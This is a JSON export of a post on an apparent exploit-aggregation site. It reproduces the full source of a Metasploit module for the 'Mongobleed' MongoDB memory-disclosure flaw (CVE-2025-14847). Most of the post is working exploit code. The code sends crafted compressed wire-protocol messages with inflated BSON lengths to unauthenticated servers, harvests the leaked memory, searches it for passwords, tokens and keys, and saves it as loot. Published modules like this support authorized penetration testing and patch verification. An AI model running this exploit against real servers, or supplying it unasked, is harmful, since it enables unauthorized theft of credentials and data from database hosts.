{"id":33340,"date":"2025-12-30T13:49:43","date_gmt":"2025-12-30T13:49:43","guid":{"rendered":"http:\/\/localhost\/?p=33340"},"modified":"2025-12-30T13:49:43","modified_gmt":"2025-12-30T13:49:43","slug":"mongodb-memory-disclosure-cve-2025-14847-mongobleed","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=33340","title":{"rendered":"MongoDB Memory Disclosure (CVE-2025-14847) – Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED-"},"content":{"rendered":"

{“lastseen”:”2025-12-30T19:04:46″,”description”:”This module exploits a memory disclosure vulnerability in MongoDB’s zlib decompression handling CVE-2025-14847. By sending crafted OPCOMPRESSED messages with inflated BSON document lengths, the server reads beyond the decompressed buffer and returns…”,”published”:”2025-12-30T18:58:44″,”modified”:”2025-12-30T18:58:44″,”type”:”metasploit”,”title”:”MongoDB Memory Disclosure (CVE-2025-14847) – Mongobleed”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-14847″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::Tcp\\n include Msf::Auxiliary::Scanner\\n include Msf::Auxiliary::Report\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘MongoDB Memory Disclosure (CVE-2025-14847) – Mongobleed’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a memory disclosure vulnerability in MongoDB’s zlib\\n decompression handling (CVE-2025-14847). By sending crafted OP_COMPRESSED\\n messages with inflated BSON document lengths, the server reads beyond the\\n decompressed buffer and returns leaked memory contents in error messages.\\n\\n The vulnerability allows unauthenticated remote attackers to leak server\\n memory which may contain sensitive information such as credentials, session\\n tokens, encryption keys, or other application data.\\n },\\n ‘Author’ =\\u003e [\\n ‘Alexander Hagenah’, # Metasploit module (x.com\/xaitax)\\n ‘Diego Ledda’, # Co-author \\u0026 review (x.com\/jbx81)\\n ‘Joe Desimone’ # Original discovery and PoC (x.com\/dez_)\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-14847’],\\n [‘URL’, ‘https:\/\/www.wiz.io\/blog\/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb’],\\n [‘URL’, ‘https:\/\/jira.mongodb.org\/browse\/SERVER-115508’],\\n [‘URL’, ‘https:\/\/x.com\/dez_’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-12-19’,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 27017\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n Opt::RPORT(27017),\\n OptInt.new(‘MIN_OFFSET’, [true, ‘Minimum BSON document length offset’, 20]),\\n OptInt.new(‘MAX_OFFSET’, [true, ‘Maximum BSON document length offset’, 8192]),\\n OptInt.new(‘STEP_SIZE’, [true, ‘Offset increment (higher = faster, less thorough)’, 1]),\\n OptInt.new(‘BUFFER_PADDING’, [true, ‘Padding added to buffer size claim’, 500]),\\n OptInt.new(‘LEAK_THRESHOLD’, [true, ‘Minimum bytes to report as interesting leak’, 10]),\\n OptBool.new(‘QUICK_SCAN’, [true, ‘Quick scan mode – sample key offsets only’, false]),\\n OptInt.new(‘REPEAT’, [true, ‘Number of scan passes (more passes = more data)’, 1])\\n ]\\n )\\n\\n register_advanced_options(\\n [\\n OptBool.new(‘SHOW_ALL_LEAKS’, [true, ‘Show all leaked fragments, not just large ones’, false]),\\n OptBool.new(‘SHOW_HEX’, [true, ‘Show hexdump of leaked data’, false]),\\n OptString.new(‘SECRETS_PATTERN’, [true, ‘Regex pattern to detect sensitive data’, ‘password|secret|key|token|admin|AKIA|Bearer|mongodb:\/\/|mongo:|conn|auth’]),\\n OptBool.new(‘FORCE_EXPLOIT’, [true, ‘Attempt exploitation even if version check indicates not vulnerable’, false]),\\n OptInt.new(‘PROGRESS_INTERVAL’, [true, ‘Show progress every N offsets (0 to disable)’, 500])\\n ]\\n )\\n end\\n\\n # MongoDB Wire Protocol constants\\n OP_QUERY = 2004 # Legacy query opcode\\n OP_REPLY = 1 # Legacy reply opcode\\n OP_COMPRESSED = 2012\\n OP_MSG = 2013\\n COMPRESSOR_ZLIB = 2\\n\\n def check_vulnerable_version(version_str)\\n # Parse version for comparison\\n version_match = version_str.match(\/^(\\\\d+\\\\.\\\\d+\\\\.\\\\d+)\/)\\n return :unknown unless version_match\\n\\n mongodb_version = Rex::Version.new(version_match[1])\\n\\n # Check against vulnerable version ranges per MongoDB JIRA SERVER-115508\\n if mongodb_version.between?(Rex::Version.new(‘3.6.0’), Rex::Version.new(‘3.6.99’)) ||\\n mongodb_version.between?(Rex::Version.new(‘4.0.0’), Rex::Version.new(‘4.0.99’)) ||\\n mongodb_version.between?(Rex::Version.new(‘4.2.0’), Rex::Version.new(‘4.2.99’))\\n return :vulnerable_eol\\n elsif mongodb_version.between?(Rex::Version.new(‘4.4.0’), Rex::Version.new(‘4.4.29’)) ||\\n mongodb_version.between?(Rex::Version.new(‘5.0.0’), Rex::Version.new(‘5.0.31’)) ||\\n mongodb_version.between?(Rex::Version.new(‘6.0.0’), Rex::Version.new(‘6.0.26’)) ||\\n mongodb_version.between?(Rex::Version.new(‘7.0.0’), Rex::Version.new(‘7.0.27’)) ||\\n mongodb_version.between?(Rex::Version.new(‘8.0.0’), Rex::Version.new(‘8.0.16’)) ||\\n mongodb_version.between?(Rex::Version.new(‘8.2.0’), Rex::Version.new(‘8.2.2’))\\n return :vulnerable\\n elsif (mongodb_version \\u003e= Rex::Version.new(‘4.4.30’) \\u0026\\u0026 mongodb_version \\u003c Rex::Version.new(‘5.0.0’)) ||\\n (mongodb_version \\u003e= Rex::Version.new(‘5.0.32’) \\u0026\\u0026 mongodb_version \\u003c Rex::Version.new(‘6.0.0’)) ||\\n (mongodb_version \\u003e= Rex::Version.new(‘6.0.27’) \\u0026\\u0026 mongodb_version \\u003c Rex::Version.new(‘7.0.0’)) ||\\n (mongodb_version \\u003e= Rex::Version.new(‘7.0.28’) \\u0026\\u0026 mongodb_version \\u003c Rex::Version.new(‘8.0.0’)) ||\\n (mongodb_version \\u003e= Rex::Version.new(‘8.0.17’) \\u0026\\u0026 mongodb_version \\u003c Rex::Version.new(‘8.2.0’)) ||\\n (mongodb_version \\u003e= Rex::Version.new(‘8.2.3’))\\n return :patched\\n end\\n\\n :unknown\\n end\\n\\n def run_host(ip)\\n # Version detection and vulnerability check\\n version_info = get_mongodb_version\\n\\n if version_info\\n version_str = version_info[:version]\\n print_status(\\”MongoDB version: #{version_str}\\”)\\n\\n vuln_status = check_vulnerable_version(version_str)\\n case vuln_status\\n when :vulnerable_eol\\n print_good(\\”Version #{version_str} is VULNERABLE (EOL, no fix available)\\”)\\n when :vulnerable\\n print_good(\\”Version #{version_str} is VULNERABLE to CVE-2025-14847\\”)\\n when :patched\\n print_warning(\\”Version #{version_str} appears to be PATCHED\\”)\\n unless datastore[‘FORCE_EXPLOIT’]\\n print_status(‘Set FORCE_EXPLOIT=true to attempt exploitation anyway’)\\n return\\n end\\n print_status(‘FORCE_EXPLOIT enabled, continuing…’)\\n when :unknown\\n print_warning(\\”Version #{version_str} – vulnerability status unknown\\”)\\n print_status(‘Proceeding with exploitation attempt…’)\\n end\\n else\\n print_warning(‘Could not determine MongoDB version’)\\n print_status(‘Proceeding with exploitation attempt…’)\\n end\\n\\n # Perform the memory leak exploitation\\n exploit_memory_leak(ip, version_info)\\n end\\n\\n def get_mongodb_version\\n connect\\n\\n # Build buildInfo command using legacy OP_QUERY\\n # This works without authentication on most MongoDB configurations\\n response = send_command(‘admin’, { ‘buildInfo’ =\\u003e 1 })\\n disconnect\\n\\n return nil if response.nil?\\n\\n # Parse BSON response to extract version\\n parse_build_info(response)\\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET =\\u003e e\\n vprint_error(\\”Connection error during version check: #{e.message}\\”)\\n nil\\n rescue StandardError =\\u003e e\\n vprint_error(\\”Error getting MongoDB version: #{e.message}\\”)\\n nil\\n ensure\\n begin\\n disconnect\\n rescue StandardError\\n nil\\n end\\n end\\n\\n def send_command(database, command)\\n # Build BSON document for command\\n bson_doc = build_bson_document(command)\\n\\n # Build OP_QUERY packet\\n # flags (4 bytes) + fullCollectionName + numberToSkip (4) + numberToReturn (4) + query\\n collection_name = \\”#{database}.$cmd\\\\x00\\”\\n\\n query_body = [0].pack(‘V’) # flags\\n query_body \\u003c\\u003c collection_name # fullCollectionName (null-terminated)\\n query_body \\u003c\\u003c [0].pack(‘V’) # numberToSkip\\n query_body \\u003c\\u003c [1].pack(‘V’) # numberToReturn\\n query_body \\u003c\\u003c bson_doc # query document\\n\\n # Build header\\n request_id = rand(0xFFFFFFFF)\\n message_length = 16 + query_body.length\\n header = [message_length, request_id, 0, OP_QUERY].pack(‘VVVV’)\\n\\n # Send and receive\\n sock.put(header + query_body)\\n\\n # Read response\\n response_header = sock.get_once(16, 5)\\n return nil if response_header.nil? || response_header.length \\u003c 16\\n\\n msg_len, _req_id, _resp_to, opcode = response_header.unpack(‘VVVV’)\\n return nil unless opcode == OP_REPLY\\n\\n # Read rest of response\\n remaining = msg_len – 16\\n return nil if remaining \\u003c= 0\\n\\n response_body = sock.get_once(remaining, 5)\\n return nil if response_body.nil?\\n\\n # OP_REPLY structure:\\n # responseFlags (4) + cursorID (8) + startingFrom (4) + numberReturned (4) + documents\\n return nil if response_body.length \\u003c 20\\n\\n response_body[20..] # Return documents portion\\n end\\n\\n def build_bson_document(hash)\\n doc = ”.b\\n\\n hash.each do |key, value|\\n case value\\n when Integer\\n if value.between?(-2_147_483_648, 2_147_483_647)\\n doc \\u003c\\u003c \\”\\\\x10\\” # int32 type\\n doc \\u003c\\u003c \\”#{key}\\\\x00\\” # key (cstring)\\n doc \\u003c\\u003c [value].pack(‘V’) # value\\n else\\n doc \\u003c\\u003c \\”\\\\x12\\” # int64 type\\n doc \\u003c\\u003c \\”#{key}\\\\x00\\”\\n doc \\u003c\\u003c [value].pack(‘q\\u003c’)\\n end\\n when Float\\n doc \\u003c\\u003c \\”\\\\x01\\” # double type\\n doc \\u003c\\u003c \\”#{key}\\\\x00\\”\\n doc \\u003c\\u003c [value].pack(‘E’)\\n when String\\n doc \\u003c\\u003c \\”\\\\x02\\” # string type\\n doc \\u003c\\u003c \\”#{key}\\\\x00\\”\\n doc \\u003c\\u003c [value.length + 1].pack(‘V’) # string length (including null)\\n doc \\u003c\\u003c \\”#{value}\\\\x00\\”\\n when TrueClass, FalseClass\\n doc \\u003c\\u003c \\”\\\\x08\\” # boolean type\\n doc \\u003c\\u003c \\”#{key}\\\\x00\\”\\n doc \\u003c\\u003c (value ? \\”\\\\x01\\” : \\”\\\\x00\\”)\\n end\\n end\\n\\n doc \\u003c\\u003c \\”\\\\x00\\” # Document terminator\\n [doc.length + 4].pack(‘V’) + doc # Prepend document length\\n end\\n\\n def parse_build_info(bson_data)\\n return nil if bson_data.nil? || bson_data.length \\u003c 5\\n\\n result = {}\\n\\n # Parse BSON document\\n doc_len = bson_data[0, 4].unpack1(‘V’)\\n return nil if doc_len \\u003e bson_data.length\\n\\n pos = 4\\n while pos \\u003c doc_len – 1\\n type = bson_data[pos].ord\\n break if type == 0\\n\\n pos += 1\\n\\n # Read key (cstring)\\n key_end = bson_data.index(\\”\\\\x00\\”, pos)\\n break if key_end.nil?\\n\\n key = bson_data[pos…key_end]\\n pos = key_end + 1\\n\\n case type\\n when 0x02 # String\\n str_len = bson_data[pos, 4].unpack1(‘V’)\\n value = bson_data[pos + 4, str_len – 1]\\n pos += 4 + str_len\\n\\n case key\\n when ‘version’\\n result[:version] = value\\n when ‘gitVersion’\\n result[:git_version] = value\\n when ‘sysInfo’\\n result[:sys_info] = value\\n end\\n when 0x03 # Embedded document\\n sub_doc_len = bson_data[pos, 4].unpack1(‘V’)\\n if key == ‘buildEnvironment’\\n # Could parse this for more details\\n end\\n pos += sub_doc_len\\n when 0x10 # int32\\n pos += 4\\n when 0x12 # int64\\n pos += 8\\n when 0x01 # double\\n pos += 8\\n when 0x08 # boolean\\n pos += 1\\n when 0x04 # array\\n arr_len = bson_data[pos, 4].unpack1(‘V’)\\n pos += arr_len\\n else\\n # Unknown type, try to continue\\n break\\n end\\n end\\n\\n # Try alternate method if version not found (using hello\/isMaster)\\n result[:version] ||= try_hello_command\\n\\n result[:version] ? result : nil\\n end\\n\\n def try_hello_command\\n begin\\n response = send_command(‘admin’, { ‘hello’ =\\u003e 1 })\\n return nil if response.nil?\\n\\n # Look for version string in response\\n if response =~ \/(\\\\d+\\\\.\\\\d+\\\\.\\\\d+)\/\\n return ::Regexp.last_match(1)\\n end\\n rescue StandardError\\n nil\\n end\\n nil\\n end\\n\\n def exploit_memory_leak(ip, version_info)\\n all_leaked = ”.b\\n unique_leaks = Set.new\\n secrets_found = []\\n\\n # Determine offsets to scan\\n offsets = generate_scan_offsets\\n total_offsets = offsets.size\\n repeat_count = datastore[‘REPEAT’]\\n\\n if repeat_count \\u003e 1\\n print_status(\\”Running #{repeat_count} scan passes to maximize data collection…\\”)\\n end\\n\\n # Track overall progress\\n progress_interval = datastore[‘PROGRESS_INTERVAL’]\\n Time.now\\n\\n 1.upto(repeat_count) do |pass|\\n if repeat_count \\u003e 1\\n print_status(\\”=== Pass #{pass}\/#{repeat_count} ===\\”)\\n end\\n\\n print_status(\\”Scanning #{total_offsets} offsets (#{datastore[‘MIN_OFFSET’]}-#{datastore[‘MAX_OFFSET’]}, step=#{datastore[‘STEP_SIZE’]}#{datastore[‘QUICK_SCAN’] ? ‘, quick mode’ : ”})\\”)\\n\\n start_time = Time.now\\n scanned = 0\\n pass_leaks = 0\\n\\n offsets.each do |doc_len|\\n # Progress reporting\\n scanned += 1\\n if progress_interval \\u003e 0 \\u0026\\u0026 (scanned % progress_interval == 0)\\n elapsed = Time.now – start_time\\n rate = scanned \/ elapsed\\n remaining = ((total_offsets – scanned) \/ rate).round\\n print_status(\\”Progress: #{scanned}\/#{total_offsets} (#{(scanned * 100.0 \/ total_offsets).round(1)}%) – #{unique_leaks.size} leaks found – ETA: #{remaining}s\\”)\\n end\\n\\n response = send_probe(doc_len, doc_len + datastore[‘BUFFER_PADDING’])\\n next if response.nil? || response.empty?\\n\\n leaks = extract_leaks(response)\\n leaks.each do |data|\\n next if unique_leaks.include?(data)\\n\\n unique_leaks.add(data)\\n all_leaked \\u003c\\u003c data\\n pass_leaks += 1\\n\\n # Check for interesting patterns\\n check_secrets(data, doc_len, secrets_found)\\n\\n # Report large leaks or all if configured\\n next unless data.length \\u003e datastore[‘LEAK_THRESHOLD’] || datastore[‘SHOW_ALL_LEAKS’]\\n\\n preview = data.gsub(\/[^[:print:]]\/, ‘.’)[0, 80]\\n print_good(\\”offset=#{doc_len.to_s.ljust(4)} len=#{data.length.to_s.ljust(4)}: #{preview}\\”)\\n\\n # Show hex dump if enabled\\n if datastore[‘SHOW_HEX’] \\u0026\\u0026 !data.empty?\\n print_hexdump(data)\\n end\\n end\\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET =\\u003e e\\n vprint_error(\\”Connection error at offset #{doc_len}: #{e.message}\\”)\\n next\\n rescue ::Timeout::Error\\n vprint_error(\\”Timeout at offset #{doc_len}\\”)\\n next\\n end\\n\\n # Pass summary\\n if repeat_count \\u003e 1\\n print_status(\\”Pass #{pass} complete: #{pass_leaks} new leaks (#{unique_leaks.size} total unique)\\”)\\n end\\n end\\n\\n # Overall summary and loot storage\\n if !all_leaked.empty?\\n print_line\\n print_good(\\”Total leaked: #{all_leaked.length} bytes\\”)\\n print_good(\\”Unique fragments: #{unique_leaks.size}\\”)\\n\\n # Store leaked data as loot\\n loot_info = ‘MongoDB Memory Disclosure (CVE-2025-14847)’\\n loot_info += \\” – Version: #{version_info[:version]}\\” if version_info\\u0026.dig(:version)\\n\\n path = store_loot(\\n ‘mongodb.memory_leak’,\\n ‘application\/octet-stream’,\\n ip,\\n all_leaked,\\n ‘mongobleed.bin’,\\n loot_info\\n )\\n print_good(\\”Leaked data saved to: #{path}\\”)\\n\\n # Report found secrets\\n if secrets_found.any?\\n print_line\\n print_warning(‘Potential secrets detected:’)\\n secrets_found.uniq.each do |secret|\\n print_warning(\\” – #{secret}\\”)\\n end\\n end\\n\\n # Report the vulnerability\\n vuln_info = \\”Leaked #{all_leaked.length} bytes of server memory\\”\\n vuln_info += \\” (MongoDB #{version_info[:version]})\\” if version_info\\u0026.dig(:version)\\n\\n report_vuln(\\n host: ip,\\n port: rport,\\n proto: ‘tcp’,\\n name: name,\\n refs: references,\\n info: vuln_info\\n )\\n else\\n print_status(\\”No data leaked from #{ip}:#{rport}\\”)\\n end\\n end\\n\\n def send_probe(doc_len, buffer_size)\\n # Build minimal BSON content – we lie about total length to trigger the bug\\n # int32 field \\”a\\” with value 1\\n bson_content = \\”\\\\x10a\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\”.b\\n\\n # BSON document with inflated length (this is the key to the exploit)\\n bson = [doc_len].pack(‘V’) + bson_content\\n\\n # Wrap in OP_MSG structure\\n # flags (4 bytes) + section kind (1 byte) + BSON\\n op_msg = [0].pack(‘V’) + \\”\\\\x00\\”.b + bson\\n\\n # Compress the OP_MSG payload\\n compressed_data = Zlib::Deflate.deflate(op_msg)\\n\\n # Build OP_COMPRESSED payload\\n # originalOpcode (4 bytes) + uncompressedSize (4 bytes) + compressorId (1 byte) + compressedData\\n payload = [OP_MSG].pack(‘V’)\\n payload \\u003c\\u003c [buffer_size].pack(‘V’) # Claimed uncompressed size (inflated)\\n payload \\u003c\\u003c [COMPRESSOR_ZLIB].pack(‘C’)\\n payload \\u003c\\u003c compressed_data\\n\\n # MongoDB wire protocol header\\n # messageLength (4 bytes) + requestID (4 bytes) + responseTo (4 bytes) + opCode (4 bytes)\\n message_length = 16 + payload.length\\n header = [message_length, 1, 0, OP_COMPRESSED].pack(‘VVVV’)\\n\\n # Send and receive with proper cleanup\\n response = nil\\n begin\\n connect\\n sock.put(header + payload)\\n response = recv_mongo_response\\n ensure\\n begin\\n disconnect\\n rescue StandardError\\n nil\\n end\\n end\\n\\n response\\n end\\n\\n def recv_mongo_response\\n # Read header first (16 bytes minimum)\\n header = sock.get_once(16, 2)\\n return nil if header.nil? || header.length \\u003c 4\\n\\n msg_len = header.unpack1(‘V’)\\n return header if msg_len \\u003c= 16\\n\\n # Read remaining data\\n remaining = msg_len – header.length\\n if remaining \\u003e 0\\n data = sock.get_once(remaining, 2)\\n return header if data.nil?\\n\\n header + data\\n else\\n header\\n end\\n rescue ::Timeout::Error, ::EOFError\\n nil\\n end\\n\\n def extract_leaks(response)\\n return [] if response.nil? || response.length \\u003c 25\\n\\n leaks = []\\n\\n begin\\n msg_len = response.unpack1(‘V’)\\n return [] if msg_len \\u003e response.length\\n\\n # Check if response is compressed (opcode at offset 12)\\n opcode = response[12, 4].unpack1(‘V’)\\n\\n if opcode == OP_COMPRESSED\\n # Decompress: skip header (16) + originalOpcode (4) + uncompressedSize (4) + compressorId (1) = 25 bytes\\n raw = Zlib::Inflate.inflate(response[25, msg_len – 25])\\n else\\n # Uncompressed OP_MSG – skip header\\n raw = response[16, msg_len – 16]\\n end\\n\\n return [] if raw.nil?\\n\\n # Extract field names from BSON parsing errors\\n # These contain memory leaked as \\”field names\\”\\n raw.scan(\/field name ‘([^’]*)’\/) do |match|\\n data = match[0]\\n # Filter out known legitimate field names\\n next if data.nil? || data.empty?\\n next if [‘?’, ‘a’, ‘$db’, ‘ping’, ‘ok’, ‘errmsg’, ‘code’, ‘codeName’].include?(data)\\n\\n leaks \\u003c\\u003c data\\n end\\n\\n # Extract type bytes from unrecognized BSON type errors\\n raw.scan(\/(?:unrecognized|unknown|invalid)\\\\s+(?:BSON\\\\s+)?type[:\\\\s]+(\\\\d+)\/i) do |match|\\n type_byte = match[0].to_i \\u0026 0xFF\\n leaks \\u003c\\u003c type_byte.chr if type_byte \\u003e 0\\n end\\n rescue Zlib::Error =\\u003e e\\n vprint_error(\\”Decompression error: #{e.message}\\”)\\n rescue StandardError =\\u003e e\\n vprint_error(\\”Error extracting leaks: #{e.message}\\”)\\n end\\n\\n leaks\\n end\\n\\n def check_secrets(data, offset, secrets_found)\\n pattern = Regexp.new(datastore[‘SECRETS_PATTERN’], Regexp::IGNORECASE)\\n return unless data =~ pattern\\n\\n match = ::Regexp.last_match[0]\\n match_pos = ::Regexp.last_match.begin(0)\\n\\n # Extract context around the match (20 chars before and after)\\n context_start = [match_pos – 20, 0].max\\n context_end = [match_pos + match.length + 20, data.length].min\\n context = data[context_start…context_end].gsub(\/[^[:print:]]\/, ‘.’)\\n\\n # Highlight position in context\\n secret_info = \\”Pattern ‘#{match}’ at offset #{offset}\\”\\n secret_info += \\” (pos #{match_pos}): …#{context}…\\”\\n\\n secrets_found \\u003c\\u003c secret_info\\n print_warning(\\”Secret pattern detected at offset #{offset}: ‘#{match}’ in context: …#{context}…\\”)\\n end\\n\\n def generate_scan_offsets\\n min_off = datastore[‘MIN_OFFSET’]\\n max_off = datastore[‘MAX_OFFSET’]\\n step = datastore[‘STEP_SIZE’]\\n\\n if datastore[‘QUICK_SCAN’]\\n # Quick scan mode: sample key offsets that typically yield results\\n # Based on common BSON document sizes and memory alignment\\n quick_offsets = []\\n\\n # Small offsets (header area)\\n quick_offsets += (20..100).step(5).to_a\\n\\n # Power of 2 boundaries (common allocation sizes)\\n [128, 256, 512, 1024, 2048, 4096, 8192].each do |boundary|\\n next if boundary \\u003c min_off || boundary \\u003e max_off\\n\\n # Sample around boundaries\\n (-10..10).step(2).each do |delta|\\n off = boundary + delta\\n quick_offsets \\u003c\\u003c off if off \\u003e= min_off \\u0026\\u0026 off \\u003c= max_off\\n end\\n end\\n\\n # Sample every 128 bytes for broader coverage\\n quick_offsets += (min_off..max_off).step(128).to_a\\n\\n quick_offsets.uniq.sort.select { |o| o \\u003e= min_off \\u0026\\u0026 o \\u003c= max_off }\\n else\\n # Normal scan with step size\\n (min_off..max_off).step(step).to_a\\n end\\n end\\n\\n def print_hexdump(data)\\n return if data.nil? || data.empty?\\n\\n # Print hexdump in classic format (16 bytes per line)\\n offset = 0\\n data.bytes.each_slice(16) do |chunk|\\n hex_part = chunk.map { |b| ‘%02x’ % b }.join(‘ ‘)\\n ascii_part = chunk.map { |b| (b \\u003e= 32 \\u0026\\u0026 b \\u003c 127) ? b.chr : ‘.’ }.join\\n\\n # Pad hex part if less than 16 bytes\\n hex_part = hex_part.ljust(47)\\n\\n print_line(\\” #{(‘%04x’ % offset)} #{hex_part} |#{ascii_part}|\\”)\\n offset += 16\\n\\n # Limit output to avoid flooding console\\n break if offset \\u003e= 256\\n end\\n print_line(‘ …’) if data.length \\u003e 256\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/scanner\/mongodb\/cve_2025_14847_mongobleed.rb”,”cvss”:{“score”:8.7,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:N\/SI:N\/VA:N\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/mongodb\/cve_2025_14847_mongobleed\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-30T19:04:46″,”description”:”This module exploits a memory disclosure vulnerability in MongoDB’s zlib decompression handling CVE-2025-14847. By sending crafted OPCOMPRESSED messages with inflated BSON document lengths, the server…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,169,13,7,11,5],"class_list":["post-33340","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nMongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=33340\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-30T19:04:46″,”description”:”This module exploits a memory disclosure vulnerability in MongoDB’s zlib decompression handling CVE-2025-14847. By sending crafted OPCOMPRESSED messages with inflated BSON document lengths, the server...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=33340\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-30T13:49:43+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"18 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33340#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33340\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"MongoDB Memory Disclosure (CVE-2025-14847) – Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED-\",\"datePublished\":\"2025-12-30T13:49:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33340\"},\"wordCount\":3536,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.7\",\"exploit\",\"HIGH\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=33340#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33340\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33340\",\"name\":\"MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-30T13:49:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33340#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=33340\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=33340#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"MongoDB Memory Disclosure (CVE-2025-14847) – Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero 